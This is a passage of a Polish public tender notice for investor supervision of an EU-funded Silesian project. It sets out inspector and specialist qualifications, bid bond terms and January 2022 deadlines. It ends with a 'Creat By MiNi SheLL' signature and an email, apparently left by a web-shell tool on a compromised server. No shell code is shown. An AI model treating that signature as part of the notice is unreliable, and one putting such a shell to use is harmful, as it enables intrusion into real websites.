sprawdzenie, akceptację i odbiór robót budowlanych oraz dokumentacji projektowej branży drogowej pod względem zgodności z obowiązującymi przepisami prawa oraz zgodności z Wytycznymi w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020 w związku z realizacją projektu w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2014-2020, nadzór i odbiory robót budowlanych wraz z przygotowaniem niezbędnych dokumentów koniecznych do uzyskanie pozwolenia na użytkowanie bądź skutecznego zgłoszenia zakończenia robót. Odpowiedzialny za sprawdzenie jakości wykonywanych prac a w szczególności zapobieganiu zastosowaniu wyrobów wadliwych i niedopuszczonych do stosowania w budownictwie, potwierdzanie faktycznie wykonanych prac i usunięcie wad. Osoba posiadająca uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej zgodnie z ustawą – Prawo Budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) lub równoważne. Doświadczenie na stanowisku Inspektora Nadzoru e specjalności inżynieryjnej drogowej przy realizacji co najmniej (2) dwóch kontraktów w okresie 5 lat przed złożeniem oferty, obejmujących nadzór nad realizacją zadania inwestycyjnego w specjalności inżynieryjnej drogowej o wartości co najmniej 2 mln zł (brutto) każde; e)Inspektor nadzoru w specjalności konstrukcyjno-budowlanej – osoba odpowiedzialna ze strony Wykonawcy za weryfikację, opiniowanie, sprawdzenie, akceptację i odbiór robót budowlanych oraz dokumentacji projektowej w specjalności konstrukcyjno-budowlanej pod względem zgodności z obowiązującymi przepisami prawa oraz zgodności z Wytycznymi w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020 w związku z realizacją projektu w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2014-2020, nadzór i odbiory robót w specjalności konstrukcyjno-budowlanej wraz z przygotowaniem niezbędnych dokumentów koniecznych do uzyskanie pozwolenia na użytkowanie bądź skutecznego zgłoszenia zakończenia robót. Odpowiedzialny za sprawdzenie jakości wykonywanych prac a w szczególności zapobieganiu zastosowaniu wyrobów wadliwych i niedopuszczonych do stosowania w budownictwie, przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania, potwierdzanie faktycznie wykonanych prac i usunięcie wad. Osoba posiadająca uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności konstrukcyjno - budowalnej zgodnie z ustawą Prawo Budowlane (Dz. U. z 2021 r. poz. 2351) lub równoważne. Doświadczenie na stanowisku Inspektora Nadzoru Robót ogólnobudowlanych przy realizacji co najmniej (2) dwóch kontraktów w okresie 5 lat przed złożeniem oferty, obejmujących nadzór nad budową lub przebudową obiektu o wartości co najmniej 2 mln zł (brutto) każdy;<br/>uwaga: cd warunku znajduje się w informacjach dodatkowych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/><br/>1)	Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/><br/>2)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu znajduje się w załączniku nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający żąda złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>1)	Opracowania pn. „Metodyka” stanowiącego podstawę oceny merytorycznej ofert w ramach kryterium Metodyka. W ramach kryterium Metodyka Zamawiający oceniać będzie proponowane przez Wykonawców rozwiązania mające wpływ na jakość realizacji zamówienia. Opracowanie „Metodyka” winno być sporządzone w oparciu <br/>o podkryteria określone w niniejszej SWZ, odnoszące się do proponowanej przez Wykonawcę jakości realizacji zamówienia. Opracowanie „Metodyka” powinno opisywać sposób podejścia Wykonawcy do realizacji zamówienia, w sposób zgodny z wymaganiami wynikającymi z niniejszej specyfikacji i gwarantujący najwyższą jakość. Opracowanie „Metodyka&#34; stanowi zobowiązanie Wykonawcy, iż w przypadku wyboru jego oferty jako najkorzystniejszej, będzie realizował przedmiot zamówienia zgodnie z informacjami zawartymi w tym dokumencie. „Metodykę” należy złożyć w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub osobistym;<br/><br/>2)	Wykazu doświadczenia dodatkowego osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, stanowiącego podstawę oceny ofert w ramach kryterium „Doświadczenie personelu”, zawierającego informacje nt. dodatkowego doświadczenia personelu, sporządzonego w oparciu o załącznik nr 3 do SWZ. Wykaz należy złożyć w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub osobistym. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy, którego wzór stanowi załącznik nr 2 do SWZ.<br/>2. Pełnomocnictwo lub inny dokument potwierdzający upoważniające do złożenia oferty - o ile ofertę składa pełnomocnik;<br/>3. Zobowiązanie podmiotu trzeciego (jeżeli dotyczy);<br/>4. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców <br/>w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>5. Oświadczenie o wykonaniu usług (o którym mowa w art. 117 ust. 4 pzp) – <br/>z wykorzystaniem wzoru, stanowiącego załącznik nr 5 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga od Wykonawców wniesienia wadium w kwocie 5.000 zł.<br/><br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 pzp.<br/><br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2020 r., poz. 299).<br/><br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Santander Bank Polska S.A. 44 1090 1186 0000 0001 3708 0808 <br/>z adnotacją: „Wadium Nr sprawy: ZP.270.24.2021”. W przypadku wnoszenia wadium w pieniądzu, Zamawiający uznaje za wniesione skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.<br/><br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji bankowej Wykonawca przekazuje oryginał gwarancji w formie elektronicznej (podpisanej kwalifikowanym podpisem elektronicznym). Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 3-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/><br/>6.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać nieodwoływalne <br/>i bezwarunkowe, na każde żądanie zgłoszone przez zamawiającego, zobowiązanie gwaranta (poręczyciela) do zapłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Pzp. Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale 9 ust. 2 SWZ, składa każdy z wykonawców. <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/><br/>5.	Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/><br/>6.	W przypadku, o którym mowa w ust. 2 Wykonawcy wspólnie ubiegających się o udzielenie zamówienia zobligowani są do złożenia wraz z ofertą oświadczenia, o którym mowa w art. 117 ust. 4 Pzp., tj. oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy, o treści załącznika nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy zawiera załącznik nr 7 do SWZ.<br/>2.	Informacje nt. zmian postanowień umowy zawiera §11 projektowanych postanowień umowy oraz rozdz. 21 SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. warunków udziału w postępowaniu<br/>f)Inspektor nadzoru – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, osoba odpowiedzialna ze strony Wykonawcy za weryfikację, opiniowanie, sprawdzenie, akceptację i odbiór dokumentacji projektowej branży sieci i instalacji teletechnicznych i niskoprądowych pod względem zgodności z obowiązującymi przepisami prawa oraz zgodności z Wytycznymi w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014-2020 w związku z realizacją projektu w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2014-2020, nadzór i odbiory robót budowlanych wraz z przygotowaniem niezbędnych dokumentów koniecznych do uzyskanie pozwolenia na użytkowanie bądź skutecznego zgłoszenia zakończenia robót. Odpowiedzialny za sprawdzenie jakości wykonywanych prac a w szczególności zapobieganiu zastosowaniu wyrobów wadliwych i niedopuszczonych do stosowania w budownictwie, sprawdzenie i odbiór przyłączy teletechnicznych (w tym światłowodowych) i niskoprądowych (automatyki i sterowania), uczestniczenie w próbach i odbiorach technicznych instalacji urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania, potwierdzanie faktycznie wykonanych prac i usunięcie wad. Osoba posiadająca uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych zgodnie z ustawą – Prawo Budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) lub równoważne. Doświadczenie na stanowisku Inspektora Nadzoru Robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych przy realizacji co najmniej (2) dwóch kontraktów w okresie 5 lat przed złożeniem oferty, obejmujących nadzór nad realizacją zadania inwestycyjnego o wartości w zakresie sieci, instalacji i urządzeń telekomunikacyjnych co najmniej 2 mln zł (brutto) każde; g)Specjalista ds. prawnych – radca prawny, adwokat lub osoba z wykształceniem prawniczym, odpowiedzialny za bieżące wsparcie prawne, a w szczególności za rozstrzyganie wszystkich spornych kwestii, które mogą wystąpić w trakcie prac zespołu nadzoru inwestorskiego przy realizacji przedmiotowego projektu. Wymagane doświadczenie przy realizacji co najmniej (2) dwóch kontraktów obejmujących wsparcie prawne oraz rozstrzyganie kwestii spornych przy realizacji zadania inwestycyjnego o wartości co najmniej 15 mln zł (brutto) każde; h) Specjalista – w zakresie elektrycznego taboru autobusowego, odpowiedzialny za weryfikację jakości, zgodności z opisem zamówienia, opiniowanie, akceptację i odbiór dostarczonego taboru autobusowego. Wymagane doświadczenie w odbiorach autobusów o napędzie elektrycznym przy realizacji co najmniej dwóch kontraktów w ilości 5 szt. autobusów o napędzie elektrycznym wśród których odbierane były autobusy zarówno BN jak i CN, z tym, że dopuszcza się, że autobusy CN były odbierane tylko w ramach jednego kontraktu

Creat By MiNi SheLL
Email: jattceo@gmail.com